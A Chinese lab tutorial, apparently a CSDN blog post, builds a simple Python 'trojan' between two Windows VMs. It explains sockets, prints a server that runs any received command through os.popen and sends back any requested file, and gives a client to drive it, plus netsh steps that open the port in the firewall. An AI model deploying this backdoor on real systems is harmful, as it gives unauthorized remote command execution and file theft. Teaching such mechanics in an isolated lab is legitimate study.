1. 目的
基于python实现一个简单的木马实验:在客户端中读取服务端的文件,在VMware中跑通。
2. 原理
2.1 TCP/IP协议:
TCP/IP协议主要由网络层的IP协议 和 传输层的TCP协议组成 。
五层协议:
- 应用层:网络服务;协议:HTTP, FTP。
- 传输层:数据传输;协议:TCP, UDP。
- 网络层:路由转发;协议:IP。
- 数据链路层:数据帧传输;协议:Ethernet。
- 物理层:硬件传输;介质:电缆, 光纤。
应用层:负责处理特定的网络应用程序,为用户提供各种服务。常见的应用层协议包括:
- HTTP(Hypertext Transfer Protocol):用于网页浏览。
- HTTPS(HTTP Secure):HTTP的安全版本,通过SSL/TLS加密。
- FTP(File Transfer Protocol):用于文件传输。
- SMTP(Simple Mail Transfer Protocol):用于电子邮件传输。
- POP3(Post Office Protocol 3)和IMAP(Internet Message Access Protocol):用于电子邮件接收。
- DNS(Domain Name System):用于域名解析,将域名转换为IP地址。
传输层:TCP与UDP的区别
- TCP:面向连接、可靠传输、流量控制、拥塞控制、数据重传。
- UDP:无连接、简单快速、不保证顺序、不保证数据完整性。
网络层:IP地址与子网划分
- IPv4地址:32位,通常以点分十进制表示(如192.168.0.1)。
- IPv6地址:128位,通常以冒号分隔的十六进制表示(如2001:0db8:85a3:0000:0000:8a2e:0370:7334)。
- 子网掩码:用于划分网络部分和主机部分,例如255.255.255.0。
IP 或 ICMP、TCP 或 UDP、TELNET 或 FTP、以及 HTTP 等都属于 TCP/IP 协议,他们与 TCP 或 IP 的关系紧密。因此,也称 TCP/IP 为网际协议群。
2.2 TCP连接
参考:https://blog.csdn.net/weixin_53186633/article/details/120514627
TCP负责发现传输的问题,一有问题就发出信号,要求重新传输,直到所有数据安全正确地传输到目的地。
TCP协议是传输控制协议,工作在传输层。提供面向链接的,可靠的传输服务(三次握手,四次挥手)
建立TCP连接
TCP连接就是通过TCP协议在2台主机(的两个程序之间)之间建立起一个数据传输通道,主机就可以通过该通道相互传送数据,TCP连接也称为Socket。
2.3 socket
参考:玄魂工作室
Socket(套接字)是一种编程接口,一般面向网络层和传输层协议(套接字并不限于TCP/IP),每个套接字绑定一个ip一个端口。在Internet上的主机一般运行了多个服务软件,同时提供几种服务。每种服务都打开一个Socket,并绑定到一个端口上,不同的端口对应于不同的服务。比如QQ服务端对外绑定8000端口,web服务器一般对外绑定80端口。
Python 提供了两个基本的 socket 模块:
socket它提供了标准的BSD Socket API。socketserver为服务器端编程提供了进一步封装,可以简化网络服务器的开发。
调用socket.socket可以创建一个Socket实例,socket类构造函数声明如下:
socket(family, type[,protocal])
我们看到socket构造函数接收三个参数,第一个为family。family表示套接字对象使用的地址族,可选值:AF_INET——IPv4地址族,AF_INET6——IPv6地址族,AF_UNIX——针对类UNIX系统的套接字。第二个为type,可使用的类型如下:
| socket 类型 | 描述 |
|---|---|
| socket.SOCK_STREAM | 基于TCP的流式socket通信 |
| socket.SOCK_DGRAM | 基于UDP的数据报式socket通信 |
| socket.SOCK_RAW | 原始套接字,普通的套接字无法处理ICMP、IGMP等网络报文,而SOCK_RAW可以;其次SOCK_RAW也可以处理特殊的IPV4报文;此外,利用原始套接字,可以通过IP_HDRINCL套接字选项由用户构造IP头 |
| socket.SOCK_SEQPACKET | 可靠的连续数据包服务 |
第三个参数protocal是协议类型,默认是0表示套接字,在套接字编程中不需要关心该参数。
创建TCP Socket的方法如下:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
创建UDP Socket的方法如下:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
3. 编程逻辑
Socket客户端编程的基本步骤:
- 创建套接字
- 连接服务端
- 发送数据
- 接收数据
- 关闭连接
Socket服务端编程的基本步骤:
- 创建套接字
- 绑定客户端
- 监听
- 接收数据
- 发送数据
- 关闭连接
4. 虚拟机环境配置
4.1 VMware安装
参考教程:https://blog.csdn.net/weixin_74195551/article/details/127288338
4.2 windows.iso下载(官网下载速度比别人的网盘快很多)
1、下载地址:https://www.microsoft.com/zh-cn/software-download/windows10/
2、 参考教程:https://blog.csdn.net/Cappuccino_jay/article/details/125536014?spm=1001.2014.3001.5502
4.3 在VMware中安装win10
安装两个win10虚拟机,一个作为服务器(被攻击方),一个作为客户端(攻击方)。
1、 参考教程:https://blog.csdn.net/lvlheike/article/details/120398259
(在VMware安装完首次启动windows系统后不需要添加微软账号,直接使用脱机账户,就可以不设置开机密码,即回车作为密码)
4.4 在win10中安装python和vscode
- python下载地址:https://www.python.org/
- vscode下载地址:https://code.visualstudio.com/download
- 参考教程:https://blog.csdn.net/qq_53280175/article/details/121107748
vscode安装完后只添加一个python插件就可以了,软件会自动提示选择信任此系统,信任文件所在的文件夹(我们后续把文件放在桌面,所以这里信任桌面文件夹)
https://blog.csdn.net/msdcp/article/details/127033151
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/86988d5dbd5e2a32f308f0d42086fcd0.png)
4.5 在两个虚拟机中设置共享文件夹(先关机虚拟机,共享文件夹名为英文)
参考教程:https://blog.csdn.net/mystonelxj/article/details/103380904
在主机中把代码放入共享文件夹中,再从虚拟机中拖入桌面
5. 代码
代码参考:玄魂工作室
服务器(受攻击方):
import socket
import sys
import os
class server:
def __init__(self, ip, port):
self.port = port
self.ip = ip
self.bufferSize = 10240
def start(self): # 启动监听,接收数据
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind((self.ip, self.port)) # 绑定
s.listen(10) # 监听
print('等待客户端连接')
while True: # 一直等待新的连接
try:
conn, addr = s.accept() # 接收连接
print('客户端连接 ' + addr[0] + ':' + str(addr[1]))
while True: # 不知道客户端发送数据大小,循环接收
data = conn.recv(self.bufferSize)
if not data:
break
else:
self.executeCommand(conn,data)
conn.close()
except socket.error as e:
print(e)
conn.close() # 关闭连接
finally:
s.close() # 关闭服务端
def executeCommand(self, tcpCliSock, data): # 解析并执行命令
try:#
message = data.decode("utf-8")
if os.path.isfile(message):#判断是否是文件
filesize = str(os.path.getsize(message))#获取文件大小
print("文件大小为:",filesize)
tcpCliSock.send(filesize.encode())#发送文件大小
data = tcpCliSock.recv(self.bufferSize)
print("开始发送")
f = open(message, "rb")#打开文件
for line in f:
tcpCliSock.send(line)#发送文件内容
else:
tcpCliSock.send(('0001'+os.popen(message).read()).encode('utf-8'))
except:
raise
if __name__ == '__main__':
s = server('', 8800)
s.start()
客户端(攻击方):
import socket
import sys
import re
import os
class Client:
def __init__(self,serverIp,serverPort):
self.serverIp=serverIp #待连接的远程主机的域名
self.serverPort = serverPort
self.bufferSize = 10240
def connet(self): #连接方法
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as e:
print("Failed to create socket. Error: %s"%e)
try:
s.connect((self.serverIp,self.serverPort))
while True:
message = input('> ')#接收用户输入
if not message:
break
s.send(bytes(message, 'utf-8'))#发送命令
data = s.recv(self.bufferSize)#接收数据
if not data:
break
if re.search("^0001",data.decode('utf-8','ignore')):#判断数据类型
print(data.decode('utf-8')[4:])
else:#文件内容处理
s.send("File size received".encode())#通知服务端可以发送文件了
file_total_size = int(data.decode())#总大小
received_size = 0
f = open("new" +os.path.split(message)[-1], "wb")#创建文件
while received_size < file_total_size:
data = s.recv(self.bufferSize)
f.write(data)#写文件
received_size += len(data)#累加接收长度
print("已接收:", received_size)
f.close()#关闭文件
print("receive done", file_total_size, " ", received_size)
except socket.error:
s.close()
raise #退出进程
finally:
s.close()
if __name__ == '__main__':
cl = Client('服务器的IP地址',8800)
cl.connet()
sys.exit() #退出进程
6. 步骤
- 在服务器中,底部导航栏搜索cmd,右键管理员身份运行,查找服务器ipv4地址:
ipconfig
在客户端cmd中测试网络连接,确保两台主机在同一个网络中
ping <服务器IP地址> - 在服务器中,由于我们在案例中使用8800端口,先检查8800端口是否被占用
netstat -ano|findstr "8800"
如图所示,8800端口被占用,杀死该进程释放8800端口,此进程号为:5720 (该方法也可以用于杀死正在运行中的木马进程)
taskkill /pid 5720 /F
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/b16e1ccaca8db0d1299837869eb3767d.png)
-
添加允许8800端口入站流量的防火墙规则(注意管理员身份运行)(成功则返回“确定”)
netsh advfirewall firewall add rule name="Open Port 8800" dir=in action=allow protocol=TCP localport=8800
确认防火墙规则已添加
netsh advfirewall firewall show rule name="Open Port 8800"
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/962d1f23a02cb89fdabd07bb8bf737f9.png)
-
在客户端中,底部导航栏中搜索控制面板,点击“程序和功能”。点击“打开或关闭Windows功能”。
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/a09a91924e4c880480a0bc769ee32c34.png)
在弹出的窗口中,找到“Telnet客户端”选项,勾选它,然后点击“确定”。
等待Windows启用Telnet客户端,完成后关闭所有窗口。
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/125fe15c81d3fb1800d9d5619d36d6ec.png)
在cmd中,输入以下命令测试连接:
telnet <服务器IP地址> 8800
如果连接成功,屏幕会变黑,表示Telnet连接成功(如果服务器8800端口已经在监听状态中,在客户端黑幕中随便输入一点东西,则服务器中会对客户端的输入做出响应)。如果连接失败,会显示错误消息。
5. 在服务器的vscode中运行server.py文件,出现下图则运行成功
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/f4d4696eda22116a803d91a86e0a98b1.png)
在客户端中运行client.py文件,等待一会儿。如果出现下图所示的错误提示则回到前几步检查网络连接、端口问题。
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/28b556daa68b4f3976c5b7fc4d9971ff.png)
如果没出现错误提示,而出现“>”则输入dir,查看服务器工作目录。
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/95d8b723c43ac9d80a15b980640d629b.png)
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/b4522fe5bf4e2e49545be0b4d77af0f1.png)
输入文件路径,等待文件数据发送和接收。
客户端:
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/868a6286f1ae0d723a91d9f4c5fdb723.png)
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/68ea33319fc5395773c622921718e92f.png)
服务器端:
![[图片]](https://i-blog.csdnimg.cn/blog_migrate/5e6172cefcc95d22698dcb31005dcc3d.png)
7. 结论
实验成功。
8. 参考
- https://blog.csdn.net/Cappuccino_jay/article/details/125536014?spm=1001.2014.3001.5502
- https://blog.csdn.net/lvlheike/article/details/120398259
- https://blog.csdn.net/qq_53280175/article/details/121107748
- https://blog.csdn.net/msdcp/article/details/127033151
- https://blog.csdn.net/mystonelxj/article/details/103380904
- https://blog.csdn.net/weixin_74195551/article/details/127288338
扫一扫
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
